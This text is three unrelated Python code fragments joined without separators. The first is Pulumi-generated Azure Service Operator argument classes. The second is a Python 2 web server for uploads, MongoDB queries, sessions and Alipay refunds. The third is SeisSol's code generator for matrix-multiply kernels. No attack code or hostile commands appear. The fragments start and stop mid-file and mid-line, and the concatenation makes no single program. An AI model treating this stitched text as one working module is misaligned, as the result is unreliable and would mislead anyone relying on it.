'StandardRAGRS', 'StandardZRS', 'PremiumLRS', 'PremiumZRS', 'StandardGZRS', 'StandardRAGZRS' """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @pulumi.input_type class StorageAccountStatusArgs: def __init__(__self__, *, completed: Optional[pulumi.Input[str]] = None, contains_update: Optional[pulumi.Input[bool]] = None, failed_provisioning: Optional[pulumi.Input[bool]] = None, flattened_secrets: Optional[pulumi.Input[bool]] = None, message: Optional[pulumi.Input[str]] = None, output: Optional[pulumi.Input[str]] = None, polling_url: Optional[pulumi.Input[str]] = None, provisioned: Optional[pulumi.Input[bool]] = None, provisioning: Optional[pulumi.Input[bool]] = None, requested: Optional[pulumi.Input[str]] = None, resource_id: Optional[pulumi.Input[str]] = None, spec_hash: Optional[pulumi.Input[str]] = None, state: Optional[pulumi.Input[str]] = None): """ ASOStatus (AzureServiceOperatorsStatus) defines the observed state of resource actions """ if completed is not None: pulumi.set(__self__, "completed", completed) if contains_update is not None: pulumi.set(__self__, "contains_update", contains_update) if failed_provisioning is not None: pulumi.set(__self__, "failed_provisioning", failed_provisioning) if flattened_secrets is not None: pulumi.set(__self__, "flattened_secrets", flattened_secrets) if message is not None: pulumi.set(__self__, "message", message) if output is not None: pulumi.set(__self__, "output", output) if polling_url is not None: pulumi.set(__self__, "polling_url", polling_url) if provisioned is not None: pulumi.set(__self__, "provisioned", provisioned) if provisioning is not None: pulumi.set(__self__, "provisioning", provisioning) if requested is not None: pulumi.set(__self__, "requested", requested) if resource_id is not None: pulumi.set(__self__, "resource_id", resource_id) if spec_hash is not None: pulumi.set(__self__, "spec_hash", spec_hash) if state is not None: pulumi.set(__self__, "state", state) @property @pulumi.getter def completed(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "completed") @completed.setter def completed(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "completed", value) @property @pulumi.getter(name="containsUpdate") def contains_update(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, "contains_update") @contains_update.setter def contains_update(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "contains_update", value) @property @pulumi.getter(name="failedProvisioning") def failed_provisioning(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, "failed_provisioning") @failed_provisioning.setter def failed_provisioning(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "failed_provisioning", value) @property @pulumi.getter(name="flattenedSecrets") def flattened_secrets(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, "flattened_secrets") @flattened_secrets.setter def flattened_secrets(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "flattened_secrets", value) @property @pulumi.getter def message(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "message") @message.setter def message(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "message", value) @property @pulumi.getter def output(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "output") @output.setter def output(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "output", value) @property @pulumi.getter(name="pollingUrl") def polling_url(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "polling_url") @polling_url.setter def polling_url(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "polling_url", value) @property @pulumi.getter def provisioned(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, "provisioned") @provisioned.setter def provisioned(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "provisioned", value) @property @pulumi.getter def provisioning(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, "provisioning") @provisioning.setter def provisioning(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "provisioning", value) @property @pulumi.getter def requested(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "requested") @requested.setter def requested(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "requested", value) @property @pulumi.getter(name="resourceId") def resource_id(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "resource_id") @resource_id.setter def resource_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "resource_id", value) @property @pulumi.getter(name="specHash") def spec_hash(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "spec_hash") @spec_hash.setter def spec_hash(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "spec_hash", value) @property @pulumi.getter def state(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "state") @state.setter def state(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "state", value) @pulumi.input_type class VirtualNetworkSpecArgs: def __init__(__self__, *, address_space: pulumi.Input[str], location: pulumi.Input[str], resource_group: pulumi.Input[str], subnets: Optional[pulumi.Input[Sequence[pulumi.Input['VirtualNetworkSpecSubnetsArgs']]]] = None): """ VirtualNetworkSpec defines the desired state of VirtualNetwork :param pulumi.Input[str] location: INSERT ADDITIONAL SPEC FIELDS - desired state of cluster Important: Run "make" to regenerate code after modifying this file """ pulumi.set(__self__, "address_space", address_space) pulumi.set(__self__, "location", location) pulumi.set(__self__, "resource_group", resource_group) if subnets is not None: pulumi.set(__self__, "subnets", subnets) @property @pulumi.getter(name="addressSpace") def address_space(self) -> pulumi.Input[str]: return pulumi.get(self, "address_space") @address_space.setter def address_space(self, value: pulumi.Input[str]): pulumi.set(self, "address_space", value) @property @pulumi.getter def location(self) -> pulumi.Input[str]: """ INSERT ADDITIONAL SPEC FIELDS - desired state of cluster Important: Run "make" to regenerate code after modifying this file """ return pulumi.get(self, "location") @location.setter def location(self, value: pulumi.Input[str]): pulumi.set(self, "location", value) @property @pulumi.getter(name="resourceGroup") def resource_group(self) -> pulumi.Input[str]: return pulumi.get(self, "resource_group") @resource_group.setter def resource_group(self, value: pulumi.Input[str]): pulumi.set(self, "resource_group", value) @property @pulumi.getter def subnets(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['VirtualNetworkSpecSubnetsArgs']]]]: return pulumi.get(self, "subnets") @subnets.setter def subnets(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['VirtualNetworkSpecSubnetsArgs']]]]): pulumi.set(self, "subnets", value) @pulumi.input_type class VirtualNetworkSpecSubnetsArgs: def __init__(__self__, *, subnet_address_prefix: pulumi.Input[str], subnet_name: pulumi.Input[str], service_endpoints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None): """ VNetSubnets defines subnets for this vnet :param pulumi.Input[str] subnet_name: INSERT ADDITIONAL STATUS FIELD - define observed state of cluster Important: Run "make" to regenerate code after modifying this file """ pulumi.set(__self__, "subnet_address_prefix", subnet_address_prefix) pulumi.set(__self__, "subnet_name", subnet_name) if service_endpoints is not None: pulumi.set(__self__, "service_endpoints", service_endpoints) @property @pulumi.getter(name="subnetAddressPrefix") def subnet_address_prefix(self) -> pulumi.Input[str]: return pulumi.get(self, "subnet_address_prefix") @subnet_address_prefix.setter def subnet_address_prefix(self, value: pulumi.Input[str]): pulumi.set(self, "subnet_address_prefix", value) @property @pulumi.getter(name="subnetName") def subnet_name(self) -> pulumi.Input[str]: """ INSERT ADDITIONAL STATUS FIELD - define observed state of cluster Important: Run "make" to regenerate code after modifying this file """ return pulumi.get(self, "subnet_name") @subnet_name.setter def subnet_name(self, value: pulumi.Input[str]): pulumi.set(self, "subnet_name", value) @property @pulumi.getter(name="serviceEndpoints") def service_endpoints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: return pulumi.get(self, "service_endpoints") @service_endpoints.setter def service_endpoints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "service_endpoints", value) @pulumi.input_type class VirtualNetworkStatusArgs: def __init__(__self__, *, completed: Optional[pulumi.Input[str]] = None, contains_update: Optional[pulumi.Input[bool]] = None, failed_provisioning: Optional[pulumi.Input[bool]] = None, flattened_secrets: Optional[pulumi.Input[bool]] = None, message: Optional[pulumi.Input[str]] = None, output: Optional[pulumi.Input[str]] = None, polling_url: Optional[pulumi.Input[str]] = None, provisioned: Optional[pulumi.Input[bool]] = None, provisioning: Optional[pulumi.Input[bool]] = None, requested: Optional[pulumi.Input[str]] = None, resource_id: Optional[pulumi.Input[str]] = None, spec_hash: Optional[pulumi.Input[str]] = None, state: Optional[pulumi.Input[str]] = None): """ ASOStatus (AzureServiceOperatorsStatus) defines the observed state of resource actions """ if completed is not None: pulumi.set(__self__, "completed", completed) if contains_update is not None: pulumi.set(__self__, "contains_update", contains_update) if failed_provisioning is not None: pulumi.set(__self__, "failed_provisioning", failed_provisioning) if flattened_secrets is not None: pulumi.set(__self__, "flattened_secrets", flattened_secrets) if message is not None: pulumi.set(__self__, "message", message) if output is not None: pulumi.set(__self__, "output", output) if polling_url is not None: pulumi.set(__self__, "polling_url", polling_url) if provisioned is not None: pulumi.set(__self__, "provisioned", provisioned) if provisioning is not None: pulumi.set(__self__, "provisioning", provisioning) if requested is not None: pulumi.set(__self__, "requested", requested) if resource_id is not None: pulumi.set(__self__, "resource_id", resource_id) if spec_hash is not None: pulumi.set(__self__, "spec_hash", spec_hash) if state is not None: pulumi.set(__self__, "state", state) @property @pulumi.getter def completed(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "completed") @completed.setter def completed(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "completed", value) @property @pulumi.getter(name="containsUpdate") def contains_update(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, "contains_update") @contains_update.setter def contains_update(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "contains_update", value) @property @pulumi.getter(name="failedProvisioning") def failed_provisioning(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, "failed_provisioning") @failed_provisioning.setter def failed_provisioning(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "failed_provisioning", value) @property @pulumi.getter(name="flattenedSecrets") def flattened_secrets(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, "flattened_secrets") @flattened_secrets.setter def flattened_secrets(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "flattened_secrets", value) @property @pulumi.getter def message(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "message") @message.setter def message(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "message", value) @property @pulumi.getter def output(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "output") @output.setter def output(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "output", value) @property @pulumi.getter(name="pollingUrl") def polling_url(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "polling_url") @polling_url.setter def polling_url(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "polling_url", value) @property @pulumi.getter def provisioned(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, "provisioned")
os.path.exists(p): os.mkdir(p) return p def create_voice_dir(): global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR if not os.path.exists(UPLOAD_VOICE_DIR): os.mkdir(UPLOAD_VOICE_DIR) def check_voice_file_by_fault(id): global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR create_voice_dir() ret = False for fn in os.listdir(UPLOAD_VOICE_DIR): if id in fn: ret = True break return ret def get_voice_file_latest(id): global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR create_voice_dir() l = [] for fn in os.listdir(UPLOAD_VOICE_DIR): if id in fn: l.append(fn) ret = None if len(l)>0: l.sort() ret = l[-1] return ret def get_voice_file_by(id): global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR create_voice_dir() l = [] for fn in os.listdir(UPLOAD_VOICE_DIR): if id in fn: l.append(fn) return l def get_voice_file_all(): global STATICRESOURCE_DIR, UPLOAD_VOICE_DIR s = set() for fn in os.listdir(UPLOAD_VOICE_DIR): p = os.path.join(UPLOAD_VOICE_DIR, fn) if os.path.isfile(p): arr = fn.split('@') if len(arr)==3: id = arr[1] s.add(id) return list(s) def create_pic_dir(): global STATICRESOURCE_DIR, UPLOAD_PHOTOS_DIR if not os.path.exists(os.path.join(STATICRESOURCE_DIR,'photos')): os.mkdir(os.path.join(STATICRESOURCE_DIR,'photos')) if not os.path.exists(UPLOAD_PHOTOS_DIR): os.mkdir(UPLOAD_PHOTOS_DIR) def handle_upload_file(querydict, buf): global STATICRESOURCE_DIR, UPLOAD_PHOTOS_DIR, UPLOAD_VOICE_DIR ret = False # root = os.path.abspath(STATICRESOURCE_DIR) try: if querydict.has_key('db'): db_util.gridfs_save(querydict, querydict['filename'], buf) ret = True except Exception,e: raise return ret def import_xls(path, fileobj, area, line_name, voltage, category): with open(path, 'wb') as f: f.write(fileobj) return db_util.import_tower_xls_file(area, line_name, voltage, category, path) def save_file_to(category, dir_id, filename, fileobj): root = os.path.abspath(category) if not os.path.exists(root): os.mkdir(root) p = os.path.join(root, filename) if dir_id: p = os.path.join(root, dir_id) if not os.path.exists(p): os.mkdir(p) p = os.path.join(root, dir_id, filename) with open(p, 'wb') as f: f1 = gevent.fileobject.FileObjectThread(f, 'wb') f1.write(fileobj) def geojson_to_czml(aList): cz = czml.CZML() for i in aList: if i.has_key('properties') and i['properties'].has_key('id'): packet = czml.CZMLPacket(id=i['properties']['id']) #tower if i['properties'].has_key('tower_code'): packet = czml.CZMLPacket(id=i['properties']['id'], name=i['properties']['tower_name']) packet.position = czml.Position(cartographicDegrees = [i['geometry']['coordinates'][0], i['geometry']['coordinates'][1], i['geometry']['coordinates'][2],]) packet.point = czml.Point(show=True, color={'rgba': [255, 255, 0, 255]}, pixelSize=10, outlineColor={'rgba': [0, 0, 0, 255]}, outlineWidth=1) #packet.label = czml.Label(text=i['properties']['tower_name'], show=True, scale=0.5) packet.description = i['properties']['tower_name'] #packet.billboard = czml.Billboard(image='http://localhost:88/img/tower.png') cz.append(packet) return cz def handle_post_method(environ): global ENCODING global gRequest querydict, buf = get_querydict_by_GET_POST(environ) ret = {} is_upload = False is_mongo = False use_czml = False get_extext = False headers = {} headers['Content-Type'] = 'text/json;charset=' + ENCODING if buf is not None: try: is_upload = handle_upload_file(querydict, buf) except: pass if querydict.has_key('db') and querydict.has_key('collection'): is_mongo = True dbname = querydict['db'] collection = querydict['collection'] action = None data = None if querydict.has_key('action'): action = querydict['action'] del querydict['action'] if querydict.has_key('data'): data = querydict['data'] del querydict['data'] if querydict.has_key('use_czml') and querydict['use_czml']: use_czml = True del querydict['use_czml'] if querydict.has_key('get_extext') and querydict['get_extext']: get_extext = True del querydict['get_extext'] del querydict['db'] del querydict['collection'] if action: if 'markdown_' in action or u'markdown_' in action: l = db_util.mongo_action(dbname, collection, action, data, querydict, 'markdown') else: l = db_util.mongo_action(dbname, collection, action, data, querydict) else: l = db_util.mongo_find(dbname, collection, querydict) if get_extext: l = db_util.find_extent(l) if use_czml: l = geojson_to_czml(l) if isinstance(l, list) and len(l) >= 0: ret = l elif isinstance(l, dict) and len(l.keys()) > 0: ret = l elif isinstance(l, czml.CZML): headers['Content-Type'] = 'text/json;charset=' + ENCODING return '200 OK', headers, enc(l.dumps()) #else: #ret["result"] = "%s.%s return 0 record" % (dbname, collection) #else: #ret["result"] = "unknown query operation" if not is_mongo: if querydict.has_key('thunder_counter'): try: ret = handle_thunder_soap(querydict) except: e = sys.exc_info()[1] if hasattr(e, 'message'): ret['result'] = e.message else: ret['result'] = str(e) elif querydict.has_key('op'): if querydict.has_key('area') and querydict['area'] and len(querydict['area'])>0: if querydict['op'] in ['save','delete','update']: ret = db_util.odbc_save_data_to_table(querydict['table'], querydict['op'], querydict['data'], querydict['line_id'], querydict['start_tower_id'], querydict['end_tower_id'], querydict['area']) else: ret = handle_requset_sync(querydict) elif querydict['op'] in ['alt','height'] : if querydict.has_key('lng') and querydict.has_key('lat') and isinstance(querydict['lng'], float) and isinstance(querydict['lat'], float): ret = db_util.extract_one_altitude(querydict['lng'], querydict['lat']) if querydict.has_key('data') and isinstance(querydict['data'], list): ret = db_util.extract_many_altitudes(querydict['data']) else: ret["result"] = "unknown area" elif querydict.has_key('tracks') and querydict.has_key('area'): ret = db_util.save_tracks(querydict['tracks'], querydict['area']) elif querydict.has_key('mobile_action') and querydict.has_key('area') and querydict.has_key('data'): ret = db_util.mobile_action(querydict['mobile_action'], querydict['area'], querydict['data']) if isinstance(ret, list): pass elif isinstance(ret, str) or isinstance(ret, unicode) or isinstance(ret, int) or isinstance(ret, float): pass elif isinstance(ret, dict): if len(ret.keys())==0: pass elif ret.has_key('result'): if isinstance(ret['result'], exceptions.Exception): if hasattr(ret['result'], 'message'): ret['result'] = ret['result'].message else: ret['result'] = str(ret['result']) elif isinstance(ret['result'], str) or isinstance(ret['result'], unicode) or isinstance(ret['result'], int) or isinstance(ret['result'], float): pass elif isinstance(ret['result'], list) or isinstance(ret['result'], dict): pass else: ret["result"] = "unknown operation" else: ret["result"] = "unknown operation" #time.sleep(6) #print(ret) return '200 OK', headers, json.dumps(ret, ensure_ascii=True, indent=4) # def handle_login(environ): # global ENCODING # global gRequest # buf = environ['wsgi.input'].read() # ret = None # try: # ds_plus = urllib.unquote_plus(buf) # obj = json.loads(dec(ds_plus)) # if obj.has_key(u'db') and obj.has_key(u'collection'): # is_mongo = True # dbname = obj[u'db'] # collection = obj[u'collection'] # action = None # data = None # if obj.has_key(u'action'): # action = obj[u'action'] # del obj[u'action'] # if obj.has_key(u'data'): # data = obj[u'data'] # del obj[u'data'] # if obj.has_key(u'url'): # del obj[u'url'] # if obj.has_key(u'redirect'): # del obj[u'redirect'] # del obj[u'db'] # del obj[u'collection'] # if action: # ret = db_util.mongo_action(dbname, collection, action, data, obj) # except: # raise # return ret def handle_thunder_soap(obj): ret = {} if obj['thunder_counter'] == 'GetFlashofDate': ret = soap_GetFlashofDate(obj['start_time'], obj['end_time']) if obj['thunder_counter'] == 'GetFlashofEnvelope': ret = soap_GetFlashofEnvelope(obj['start_time'], obj['end_time'], obj['lng1'], obj['lng2'], obj['lat1'], obj['lat2']) return ret def dishen_ws_loop(aWebSocket, aHash): while 1: #now = time.strftime('%Y-%m-%d %H:%M:%S')[:10] #ws.send("%d,%f\n" % ((time.time() - time.timezone)*1000, random.random()*10)) #t = (time.time() - time.timezone) * 1000 t = time.time() * 1000 if aWebSocket: #message = aWebSocket.receive() #print("message=%s" % message) aWebSocket.send( '%s\n%d' % (str(aHash),int(t)) ) else: break gevent.sleep(1.0) def check_session(environ, request, session_store): global gConfig def set_cookie(key, value): secure = False if gConfig['listen_port']['enable_ssl'].lower() == 'true': secure = True max_age = int(gConfig['authorize_platform']['session']['session_age']) cookie = ('Set-Cookie', dump_cookie(key, value, domain=str(gConfig['authorize_platform']['session']['session_domain']), max_age=max_age, secure=secure)) return cookie sid = request.cookies.get('authorize_platform_session_id') cookie = None is_expire = False sess = None if sid is None or len(sid)==0: request.session = session_store.new({}) #session_store.save(request.session) is_expire = True cookie = set_cookie('authorize_platform_session_id', request.session.sid ) sess = request.session else: request.session = session_store.get(sid) if request.session: cookie = set_cookie('authorize_platform_session_id', request.session.sid) session_store.save_if_modified(request.session) else: cookie = set_cookie('authorize_platform_session_id', '') is_expire = True sess = request.session return sess, cookie, is_expire def get_token_from_env(environ): global gConfig, gLoginToken cookie = parse_cookie(environ) session_id = None ret = None if cookie.has_key('session_id'): session_id = cookie['session_id'] if gLoginToken.has_key(session_id): ret = gLoginToken[session_id] return session_id, ret def get_session_from_env(environ): global gSessionStore cookie = parse_cookie(environ) session_id = None ret = None if cookie.has_key('session_id'): session_id = cookie['session_id'] ret = gSessionStore.get(session_id) return ret def get_userinfo_from_env(environ): global gConfig, gLoginToken cookie = parse_cookie(environ) session_id = None ret = None if cookie.has_key('session_id'): session_id = cookie['session_id'] if gLoginToken.has_key(session_id): ret = gLoginToken[session_id] return session_id, ret def get_sign_alipay(sign_data): global gConfig ret = '' text = sign_data + gConfig['pay_platform']['alipay']['partner_key'] text = enc_by_code(gConfig['pay_platform']['alipay']['input_charset'], text) if (gConfig['pay_platform']['alipay']['sign_type']).lower() == 'md5': md5.digest_size = 32 ret = md5.new(text).hexdigest() return ret def check_sign_alipay(input_charset, signature, sign_type, original_data): global gConfig text = original_data + gConfig['pay_platform']['alipay']['partner_key'] text = enc_by_code(str(input_charset), text) ret = '' if str(sign_type).lower() == 'md5': md5.digest_size = 32 ret = md5.new(text).hexdigest() return ret == str(signature) def build_query_string(data={}): ret = '' keys = data.keys() keys.sort() for k in keys: ret += '%s=%s' % (k, data[k]) if keys.index(k) < len(keys) - 1: ret += '&' return ret def get_pay_record_by_id(querydict): ret = None if querydict['pay_channel'] == 'alipay': out_trade_no = querydict['out_trade_no'] db_util.mongo_init_client('pay_platform') client = db_util.gClientMongo['pay_platform'] db = client['pay'] if 'pay_log' in db.collection_names(False): collection = db['pay_log'] ret = collection.find_one({"out_trade_no":out_trade_no}) return ret def refund_alipay(querydict): global ENCODING global gConfig, gSecurityConfig, gJoinableQueue headers = {} headers['Content-Type'] = 'text/json;charset=' + ENCODING statuscode = '200 OK' body = '' href = str(gConfig['pay_platform']['alipay']['submit_gateway']) sign_data = {} sign_data['_input_charset'] = gConfig['pay_platform']['alipay']['input_charset'] sign_data['partner'] = gConfig['pay_platform']['alipay']['partner_id'] sign_data['service'] = 'refund_fastpay_by_platform_pwd' sign_data['refund_date'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") sign_data['batch_no'] = datetime.datetime.now().strftime("%Y%m%d") + str(ObjectId()) sign_data['batch_num'] = '1' querydict['refund_date'] = sign_data['refund_date'] querydict['batch_no'] = sign_data['batch_no'] querydict['batch_num'] = int(sign_data['batch_num']) if len(gConfig['pay_platform']['alipay']['return_url'])>0: sign_data['return_url'] = gConfig['pay_platform']['alipay']['return_url'] if len(gConfig['pay_platform']['alipay']['error_notify_url'])>0: sign_data['error_notify_url'] = gConfig['pay_platform']['alipay']['error_notify_url'] if len(gConfig['pay_platform']['alipay']['notify_url'])>0: sign_data['notify_url'] = gConfig['pay_platform']['alipay']['notify_url'] rec = get_pay_record_by_id(querydict) if rec: if rec.has_key('error_code'): body = json.dumps({'result':'refund_fail_pay_has_fail' }, ensure_ascii=True, indent=4) else: if rec.has_key('seller_email') \ and rec.has_key('trade_no') : trade_no = rec['trade_no'] sign_data['seller_email'] = rec['seller_email'] querydict['seller_email'] = sign_data['seller_email'] querydict['trade_no'] = trade_no detail_data = '%s^%.2f^%s' % (trade_no, float(querydict['refund_fee']), querydict['refund_desc'] ) sign_data['detail_data'] = detail_data if not rec.has_key('seller_email'): body = json.dumps({'result':'refund_fail_seller_email_required' }, ensure_ascii=True, indent=4) if not rec.has_key('trade_no'): body = json.dumps({'result':'refund_fail_trade_no_required' }, ensure_ascii=True, indent=4) else: body = json.dumps({'result':'refund_fail_pay_trade_not_found:%s' % querydict['out_trade_no']}, ensure_ascii=True, indent=4) if len(body) == 0: #querydict['refund_result'] = 'refund_sending_to_alipay' querydict['refund_result'] = 'refund_adding_to_queue' querydict['refund_fee'] = float(querydict['refund_fee']) g = gevent.spawn(update_refund_log, querydict['out_trade_no'], querydict) #g1 = sign_and_send_alipay('post', href, sign_data) #g1.join() #resp = g1.value #s = resp.read() #print('refund response: [%s]' % dec(s)) #body = json.dumps({'result':'refund_sending_to_alipay'}, ensure_ascii=True, indent=4) try: gJoinableQueue.put({'thirdpay':'alipay', 'method':'post', 'url':href, 'data':sign_data}) except gevent.queue.Full: body
## # @file # This file is part of SeisSol. # # @author <NAME> (c.uphoff AT tum.de, http://www5.in.tum.de/wiki/index.php/Carsten_Uphoff,_M.Sc.) # # @section LICENSE # Copyright (c) 2015, SeisSol Group # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from this # software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # # @section DESCRIPTION # import Code import Kernel import os import itertools import re import tempfile import scipy.io import scipy.sparse import inspect def generateRoutineName(gemm): name = 'sparse_' + gemm['spMtxName'] if gemm['spp'] is not None else 'gemm' lda = 'Asparse' if gemm['LDA'] <= 0 else 'ldA{}'.format(gemm['LDA']) ldb = 'Bsparse' if gemm['LDB'] <= 0 else 'ldB{}'.format(gemm['LDB']) return '{}_m{}_n{}_k{}_{}_{}_ldC{}_beta{}_alignedA{}_alignedC{}_{}'.format( name, gemm['M'], gemm['N'], gemm['K'], lda, ldb, gemm['LDC'], gemm['beta'], gemm['alignedA'], gemm['alignedC'], gemm['prefetch'] ) def formatOffset(name, offset): if offset == 0: return name else: return '&{}[{}]'.format(name, offset) def functionName(name): brackets = re.match(r'^(\w+)\[(\d+)\]$', name) if brackets != None: functionName = brackets.expand(r'\1\2') base = brackets.group(1) index = int(brackets.group(2)) if index < 0: raise ValueError('Invalid name {}. Index must be greater than 0.'.format(name)) else: functionName = name base = name index = -1 return (functionName, base, index) class Generator: def __init__(self, db, libxsmmGenerator, architecture, prefix=''): self.db = db self.libxsmmGenerator = libxsmmGenerator self.architecture = architecture self.prefix = prefix def __generateGemms(self, outputDir, gemmlist): cppFilename = '{}/{}gemms.cpp'.format(outputDir,self.prefix) hFilename = '{}/{}gemms.h'.format(outputDir,self.prefix) with Code.Cpp(cppFilename) as cpp: cpp('#ifndef NDEBUG') cpp('extern long long libxsmm_num_total_flops;') cpp('#endif') cpp('#if defined( __SSE3__) || defined(__MIC__)') cpp('#include <immintrin.h>') cpp('#endif') with Code.Cpp(hFilename) as header: with header.HeaderGuard(self.prefix.upper() + 'GEMMS'): indexnamelist = [(i, generateRoutineName(gemm)) for i, gemm in enumerate(gemmlist)] keyFunc = lambda x: x[1] indexnamelist.sort(key=keyFunc) uniqueindexnames = [group.next() for key, group in itertools.groupby(indexnamelist, key=keyFunc)] for index, name in uniqueindexnames: header('void {name}({tn} const* A, {tn} const* B, {tn}* C, {tn} const* A_prefetch, {tn} const* B_prefetch, {tn} const* C_prefetch);'.format( name=name, tn=self.architecture.typename )) spp = gemmlist[index]['spp'] if spp is not None: temp = tempfile.NamedTemporaryFile() # symmetry was introduced in scipy 0.17.0 if 'symmetry' in inspect.getargspec(scipy.io.mmwrite).args: scipy.io.mmwrite(temp, scipy.sparse.coo_matrix(spp).asformat('csc'), symmetry='general') else: scipy.io.mmwrite(temp, scipy.sparse.coo_matrix(spp).asformat('csc')) sppFile = temp.name else: sppFile = '' os.system(self.__generateLibxsmmGeneratorCall(cppFilename, gemmlist[index], sppFile)) def __generateLibxsmmGeneratorCall(self, filename, gemm, sppFile): return '{} {} {} {} {} {} {} {} {} {} {} {} {} {} {} {} {}P {}'.format( self.libxsmmGenerator, gemm['type'], filename, generateRoutineName(gemm), gemm['M'], gemm['N'], gemm['K'], gemm['LDA'], gemm['LDB'], gemm['LDC'], gemm['alpha'], gemm['beta'], gemm['alignedA'], gemm['alignedC'], self.architecture.name, gemm['prefetch'], self.architecture.precision, sppFile ) def __gemmSignature(self, names, writeNames=True): if writeNames: signature = ', '.join(['{}{}* {}'.format(self.architecture.typename, ' const' if name != Kernel.Kernel.ResultName else '', name) for name in names]) else: signature = ', '.join(['{}{}*'.format(self.architecture.typename, ' const' if name != Kernel.Kernel.ResultName else '') for name in names]) return signature def __localArray(self, name, reals, aligned=True): aligned = ' __attribute__((aligned(PAGESIZE_STACK)))' if aligned else '' return '{} {}[{}]{};\n'.format(self.architecture.typename, name, reals, aligned) def generateKernels(self, outputDir, kernels): luts = dict() signatures = dict() flops = dict() generatedKernels = list() gemmlist = list() for prototype in kernels: gk = Kernel.GeneratedKernel(prototype, self.db, self.architecture) flop = (gk.nonZeroFlops, gk.hardwareFlops) funName, base, index = functionName(prototype.name) if index >= 0: if not luts.has_key(base): luts[base] = dict() signatures[base] = self.__gemmSignature(gk.involvedMatrices, writeNames=False) luts[base].update({index: base}) if not flops.has_key(base): flops[base] = dict() flops[base].update({index: flop}) else: flops[funName] = flop generatedKernels.append( (funName, gk) ) gemmlist.extend([op['gemm'] for op in gk.operations if op.has_key('gemm')]) self.__generateGemms(outputDir, gemmlist) with Code.Cpp('{}/{}kernels.h'.format(outputDir, self.prefix)) as header: with header.HeaderGuard(self.prefix.upper() + 'KERNELS'): with header.Namespace('seissol'): with header.Namespace('generatedKernels'): for name, gk in generatedKernels: header('void {}({});'.format(name, self.__gemmSignature(gk.involvedMatrices))) for key, value in luts.iteritems(): maxkey = max(value.keys()) pointers = [value[i] + str(i) if value.has_key(i) else '0' for i in range(0, maxkey+1)] header('static void (* const {}[])({}) = {{ {} }};'.format(key, signatures[key], ', '.join(pointers))) with Code.Cpp('{}/{}kernels.cpp'.format(outputDir, self.prefix)) as cpp: cpp.includeSys('cstring') 